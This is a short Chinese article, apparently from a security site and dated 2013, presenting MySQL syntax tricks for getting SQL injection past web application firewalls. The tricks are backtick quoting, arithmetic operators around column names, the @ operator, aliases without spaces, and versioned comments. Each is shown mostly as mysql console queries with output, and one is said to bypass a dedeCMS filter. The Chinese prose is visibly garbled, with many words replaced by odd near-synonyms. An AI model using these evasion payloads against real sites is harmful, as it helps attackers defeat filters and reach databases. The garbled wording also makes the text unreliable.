搜索

热门标签:

移动安全 安全管理 应用案例 网络威胁系统安全 应用安全 数据安全 云安全
当前位置: 主页 > 信息安全 > 系统安全 >

简述WAF绕过的几个别例技能

时间:2013-06-04 11:00来源:TuZhiJiaMi企业信息安全专家 点击:
本文中,笔者与大年夜家分享了几个WAF绕过的技能。对一些大年夜家都体味的技能如:/*!*/,SELECT[0x09,0x0A-0x0D,0x20,0xA0]xx FROM 不再重造轮子。 Mysql: tips1: 奇异的 ` (格局输出表的阿谁节制符) 过空
Tags系统安全(735)WAF(38)SELECT(2)  

  本文中,笔者与大年夜家分享了几个WAF绕过的技能。对一些大年夜家都体味的技能如:/*!*/,SELECT[0x09,0x0A-0x0D,0x20,0xA0]xx FROM 不再重造轮子。

  Mysql:

  tips1: 奇异的 ` (格局输出表的阿谁节制符)

  过空格 过一些正则。

  mysql> select`version`()

  -> ;

  +----------------------+

  | `version`() |

  +----------------------+

  | 5.1.50-community-log |

  +----------------------+

  1 row in set (0.00 sec)

  一个更好玩的技能,这个` 节制符可以当注释符用(限制前提)。

  mysql> select id from qs_admins where id=1;`dfff and comment it;

  +----+

  | id |

  +----+

  | 1 |

  +----+

  1 row in set (0.00 sec)

  `>usage : where id =’0′`’***xcomment on.

  tips2:奇异的“- + .”:

  mysql> select id from qs_admins;

  +----+

  | id |

  +----+

  | 1 |

  +----+

  1 row in set (0.00 sec)

  mysql> select+id-1+1.from qs_admins;

  +----------+

  | +id-1+1. |

  +----------+

  | 1 |

  +----------+

  1 row in set (0.00 sec)

  mysql> select-id-1+3.from qs_admins;

  +----------+

  | -id-1+3. |

  +----------+

  | 1 |

  +----------+

  1 row in set (0.00 sec)

  (有些人不是一向在说关头字如何过?过滤一个from … 就是如许连起来过)

  tips3: @

  mysql> select@^1.from qs_admins;

  +------+

  | @^1. |

  +------+

  | NULL |

  +------+

  这个是bypass 曾dedeCMS filter。

  或下面如许也是可以的:

  tips4:mysql function() as *** 也能够不消as 和空格

  mysql> select-count(id)test from qs_admins;

  +------+

  | test |

  +------+

  | -1 |

  +------+

  1 row in set (0.00 sec)

  tips5:/*![>5000]*/ 新机关 版本号(这个可能有些过时了。)

  mysql> /*!40000select*/ id from qs_admins;

相关文章
------分隔线----------------------------

推荐内容
热点内容